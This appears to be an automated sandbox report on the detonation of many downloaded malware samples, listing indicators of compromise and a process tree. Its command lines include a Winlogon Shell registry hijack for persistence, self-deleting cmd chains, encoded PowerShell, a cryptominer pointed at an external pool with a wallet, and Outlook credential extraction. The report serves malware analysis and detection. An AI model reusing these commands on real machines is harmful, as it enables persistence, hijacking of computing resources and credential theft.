\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 60E0G7UKRntM1TQ.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.xhtml\OpenWithProgids setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.html\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.shtml setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.webp setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" 60E0G7UKRntM1TQ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\SLN_auto_file\shell\edit\command OpenWith.exe -
Processes: chromnius.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | chromnius.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 | chromnius.exe -
NTFS ADS 33 IoCs
Processes: firefox.exe, 7.exe, tord.exe, Explorer.EXE, cmd.exe, 60E0G7UKRntM1TQ.exe, vbc(2).exe, newversion2.exe
description | ioc | process
File created | C:\Users\Admin\Downloads\Adobe_Lightroom.rar:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\yy.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\RustExternal%u202Enls..scr:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\Miljoeministeren.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\build.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\614.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\pigalicapi.exe\:Zone.Identifier:$DATA | 7.exe
File created | C:\Users\Admin\Downloads\7z2201-x64.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\tord.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe\:Zone.Identifier:$DATA | tord.exe
File created | C:\Users\Admin\Downloads\makanaki.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\vbc.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\LoaderAVX.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\WalkenBoost.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\AppData\Roaming\ucjrufs\:Zone.Identifier:$DATA | Explorer.EXE
File created | C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe\:Zone.Identifier:$DATA | cmd.exe
File created | C:\Users\Admin\Downloads\7.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\newversion2.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\8.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\HVUIOPMN.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\ChromeSetup.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\64.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\alaat2.1.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\vbc(1).exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\norza.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\AppData\Roaming\ePnxkugSsfE.exe\:Zone.Identifier:$DATA | 60E0G7UKRntM1TQ.exe
File created | C:\Users\Admin\Downloads\file.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\vbc(2).exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kniemwbpljw\Piutmyre.exe\:Zone.Identifier:$DATA | vbc(2).exe
File created | C:\Users\Admin\Downloads\Photoshop2022.rar:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\Downloads\jeymo2.1.exe:Zone.Identifier | firefox.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Putty\puttydata.exe\:Zone.Identifier:$DATA | newversion2.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes: PING.EXE
pid | process
5064 | PING.EXE
3508 | PING.EXE
2920 | PING.EXE
4332 | PING.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes: Explorer.EXE
pid | process
3064 | Explorer.EXE
3064 | Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ycayuhnew.execmstp.exevbc.exebuild.exeenqnjvfa.exepid process 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 424 build.exe 424 build.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe -
Suspicious behavior: GetForegroundWindowSpam 13 IoCs
Processes: vbc(2).exe, AddInProcess32.exe, OpenWith.exe, taskmgr.exe, Explorer.EXE, 60E0G7UKRntM1TQ.exe, svchosts.exe, zgoqp.exe, firefox.exe, xrfqtvbjh.exe, RegAsm.exe
pid | process
3896 | vbc(2).exe
4700 | AddInProcess32.exe
4908 | OpenWith.exe
1120 | taskmgr.exe
3064 | Explorer.EXE
3636 | 60E0G7UKRntM1TQ.exe
5760 | OpenWith.exe
1484 | svchosts.exe
6836 | OpenWith.exe
2560 | zgoqp.exe
4860 | firefox.exe
3188 | xrfqtvbjh.exe
5680 | RegAsm.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid | process
648 |
648 |
648 |
648 | -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
ycayuhnew.exeycayuhnew.execmstp.exezgoqp.exeenqnjvfa.exeenqnjvfa.exeAddInProcess32.exexrfqtvbjh.exe60E0G7UKRntM1TQ.exepid process 3964 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 3872 zgoqp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 1748 enqnjvfa.exe 1748 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 4700 AddInProcess32.exe 4700 AddInProcess32.exe 4700 AddInProcess32.exe 4700 AddInProcess32.exe 4844 cmstp.exe 4844 cmstp.exe 2988 xrfqtvbjh.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (distinct privilege/pid/process rows among the 64 listed events; repeated rows collapsed):
  privilege                  pid   process
  SeDebugPrivilege           4860  firefox.exe
  SeDebugPrivilege           3960  ycayuhnew.exe
  SeDebugPrivilege           4844  cmstp.exe
  SeShutdownPrivilege        3064  Explorer.EXE
  SeCreatePagefilePrivilege  3064  Explorer.EXE
  SeDebugPrivilege           2312  vbc.exe
  SeDebugPrivilege           524   enqnjvfa.exe
  SeDebugPrivilege           4892  vbc(1).exe
Suspicious use of FindShellTrayWindow 64 IoCs
Processes (distinct pid/process pairs among the 64 listed events; repeated rows collapsed):
  pid   process
  4860  firefox.exe
  1120  taskmgr.exe
  3064  Explorer.EXE
Suspicious use of SendNotifyMessage 64 IoCs
Processes (distinct pid/process pairs among the 64 listed events; repeated rows collapsed):
  pid   process
  4860  firefox.exe
  1120  taskmgr.exe
Suspicious use of SetWindowsHookEx 64 IoCs
Processes (distinct pid/process pairs among the 64 listed events; repeated rows collapsed):
  pid   process
  4860  firefox.exe
  2560  zgoqp.exe
Suspicious use of UnmapMainImage 1 IoCs
Processes:
  pid   process
  3064  Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes (distinct source/target pairs among the 64 listed events; repeated rows collapsed):
  source pid  source process  target pid  target process
  4152        firefox.exe     4860        firefox.exe
  4860        firefox.exe     1280        firefox.exe
  4860        firefox.exe     3648        firefox.exe
  4860        firefox.exe     4504        firefox.exe
outlook_office_path 1 IoCs
Processes:
  process      ioc
  Regsvcs.exe  Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
outlook_win_path 1 IoCs
Processes:
  process      ioc
  Regsvcs.exe  Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes (tree depth in brackets; image path, then command line, then behaviour tags)
[1] C:\Windows\Explorer.EXE
    command line: C:\Windows\Explorer.EXE
    - Drops file in Program Files directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    - NTFS ADS
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of UnmapMainImage
  [2] C:\Program Files\Mozilla Firefox\firefox.exe
      command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://urlhaus.abuse.ch/browse/tag/exe/
      - Suspicious use of WriteProcessMemory
    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://urlhaus.abuse.ch/browse/tag/exe/
        - Checks processor information in registry
        - Modifies registry class
        - NTFS ADS
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.0.1468251664\1171872532" -parentBuildID 20200403170909 -prefsHandle 1700 -prefMapHandle 1692 -prefsLen 1 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 1800 gpu
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.3.1562552367\1024374703" -childID 1 -isForBrowser -prefsHandle 2260 -prefMapHandle 2348 -prefsLen 112 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 2436 tab
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.13.1139717051\1641661172" -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3596 -prefsLen 6894 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 3688 tab
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.20.386769839\507367898" -parentBuildID 20200403170909 -prefsHandle 6300 -prefMapHandle 10064 -prefsLen 10101 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 9840 rdd
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.21.1534526808\1804290922" -parentBuildID 20200403170909 -prefsHandle 9780 -prefMapHandle 9784 -prefsLen 10101 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 9792 rdd
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4860.25.1607080939\996058646" -childID 3 -isForBrowser -prefsHandle 908 -prefMapHandle 10024 -prefsLen 10318 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4860 "\\.\pipe\gecko-crash-server-pipe.4860" 9152 tab
      [4] C:\Program Files\Mozilla Firefox\crashreporter.exe
          command line: "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\minidumps\49a81c05-d170-477b-b965-4e97256b0525.dmp"
          - Modifies registry class
        [5] C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
            command line: "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\minidumps\49a81c05-d170-477b-b965-4e97256b0525.dmp"
        [5] C:\Program Files\Mozilla Firefox\firefox.exe
            command line: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://urlhaus.abuse.ch/browse/tag/exe/"
          [6] C:\Program Files\Mozilla Firefox\firefox.exe
              command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://urlhaus.abuse.ch/browse/tag/exe/
              - Checks processor information in registry
  [2] C:\Users\Admin\Downloads\alaat2.1.exe
      command line: "C:\Users\Admin\Downloads\alaat2.1.exe"
      - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe" C:\Users\Admin\AppData\Local\Temp\rjyyjwcs.j
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
      [4] C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmstp.exe
      command line: "C:\Windows\SysWOW64\cmstp.exe"
      - Blocklisted process makes network request
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: /c del "C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe"
    [3] C:\Program Files\Mozilla Firefox\Firefox.exe
        command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
  [2] C:\Users\Admin\Downloads\makanaki.exe
      command line: "C:\Users\Admin\Downloads\makanaki.exe"
      - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\zgoqp.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\zgoqp.exe" C:\Users\Admin\AppData\Local\Temp\beujeu.oxz
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
      [4] C:\Users\Admin\AppData\Local\Temp\zgoqp.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\zgoqp.exe"
          - Executes dropped EXE
          - Suspicious behavior: GetForegroundWindowSpam
          - Suspicious use of SetWindowsHookEx
  [2] C:\Users\Admin\Downloads\vbc.exe
      command line: "C:\Users\Admin\Downloads\vbc.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe,"
      [4] C:\Windows\SysWOW64\PING.EXE
          command line: ping 127.0.0.1 -n 38
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe,"
          - Modifies WinLogon for persistence
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "cmd" /c ping 127.0.0.1 -n 37 > nul && copy "C:\Users\Admin\Downloads\vbc.exe" "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe" && ping 127.0.0.1 -n 37 > nul && "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe"
        - NTFS ADS
      [4] C:\Windows\SysWOW64\PING.EXE
          command line: ping 127.0.0.1 -n 37
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE
          command line: ping 127.0.0.1 -n 37
          - Runs ping.exe
      [4] C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe
          command line: "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
        [5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        [5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            - Suspicious use of SetThreadContext
            - Suspicious behavior: GetForegroundWindowSpam
            - Suspicious behavior: MapViewOfSection
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\auyghobjypbaufjnxqsmc"
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\auyghobjypbaufjnxqsmc"
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\lwdzahmlmxtnwtgrgbfgnuzv"
              - Accesses Microsoft Outlook accounts
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\vqikazxeiflshzuvqmshqhuenzv"
  [2] C:\Users\Admin\Downloads\build.exe
      command line: "C:\Users\Admin\Downloads\build.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Loads dropped DLL
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Downloads\build.exe" & exit
      [4] C:\Windows\SysWOW64\timeout.exe
          command line: timeout /t 6
          - Delays execution with timeout.exe
  [2] C:\Users\Admin\Downloads\jeymo2.1.exe
      command line: "C:\Users\Admin\Downloads\jeymo2.1.exe"
      - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe" C:\Users\Admin\AppData\Local\Temp\xofvp.izm
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
      [4] C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmmon32.exe
      command line: "C:\Windows\SysWOW64\cmmon32.exe"
      - Adds policy Run key to start application
      - Modifies Internet Explorer settings
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: /c del "C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe"
    [3] C:\Program Files\Mozilla Firefox\Firefox.exe
        command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
  [2] C:\Users\Admin\Downloads\vbc(1).exe
      command line: "C:\Users\Admin\Downloads\vbc(1).exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "cmd" /c ping 127.0.0.1 -n 47 > nul && copy "C:\Users\Admin\Downloads\vbc(1).exe" "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe" && ping 127.0.0.1 -n 47 > nul && "C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe"
      [4] C:\Windows\SysWOW64\PING.EXE
          command line: ping 127.0.0.1 -n 47
          - Runs ping.exe
  [2] C:\Users\Admin\Downloads\vbc(2).exe
      command line: "C:\Users\Admin\Downloads\vbc(2).exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - NTFS ADS
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
    [3] C:\Users\Admin\Downloads\vbc(2).exe
        command line: C:\Users\Admin\Downloads\vbc(2).exe
        - Executes dropped EXE
        - Suspicious behavior: GetForegroundWindowSpam
  [2] C:\Users\Admin\Downloads\newversion2.exe
      command line: "C:\Users\Admin\Downloads\newversion2.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - NTFS ADS
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        - Suspicious use of SetThreadContext
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 146.190.62.166:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
  [2] C:\Windows\system32\taskmgr.exe
      command line: "C:\Windows\system32\taskmgr.exe" /4
      - Checks SCSI registry key(s)
      - Checks processor information in registry
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
    [3] C:\Windows\SysWOW64\wlanext.exe
        command line: "C:\Windows\SysWOW64\wlanext.exe"
        - Modifies Internet Explorer settings
      [4] C:\Program Files\Mozilla Firefox\Firefox.exe
          command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
  [2] C:\Users\Admin\Downloads\RustExternal%u202Enls..scr
      command line: "C:\Users\Admin\Downloads\RustExternal%u202Enls..scr" /S
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        command line: #cmd
        - Checks computer location settings
      [4] C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
